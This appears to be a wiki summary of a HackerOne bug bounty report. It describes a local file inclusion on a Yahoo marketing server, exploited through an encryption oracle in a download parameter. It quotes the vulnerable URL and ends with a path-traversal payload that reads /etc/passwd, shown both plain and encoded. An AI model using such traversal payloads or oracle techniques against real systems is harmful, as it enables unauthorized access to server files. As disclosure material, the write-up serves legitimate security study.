Local File Include on marketing-dam.yahoo.com

From Hackipedia
Jump to: navigation, search
Hackerone #7779
Target: Yahoo.com
Target Module:
Type: File Inclusion/Oracle
Payload:
Original: Link
CVE:
Archive [Screenshot]

RedShark1802 gives a good description of the bug on the ticket summary section. So much of this will be a reiteration and an attempt to break it down further.

The URL that RedShark1802 starts to play with is nativity as so

marketing-dam.yahoo.com/DLMExt/DLAgent?dlurl=8lcO%3A%2F%2F0w.QbN.0.*Q%3Anbbn0%2FPSID%3Fz8A%3DAxT_DIfP7_UO9Y6I_hD67IdcI%26Ujd%3DlpxBXLmiKWMPRwUsLpu8cZ%26hj%3DaR9UU_hI-q5_UjP.W7U

With the URL encoding removed

8lcO://0w.QbN.0.*Q:nbbn0/PSID?z8A=AxT_DIfP7_UO9Y6I_hD67IdcI&Ujd=lpxBXLmiKWMPRwUsLpu8cZ&hj=aR9UU_hI-q5_UjP.W7U

The hj is the vulnerable variable, it specifies the file to download by passing the file name in an encrypted fashion.

Any encrypted string passed in via hj would be decrypted and would be part of the file download prompt. This allowed RedShark1802 to passing arbitrary strings like "aaaaaaaaaa" and obverse the response to come up with the proper attack string. A vulnerability like this is called an Oracle as it gives you an opportunity to make the encryption moot.

Eventually he was able to get the payload of
/../../../../../../../../etc/passwd
to the proper format of
/../../../../../../../../79d/zGcIwd
and collect himself a cool $2500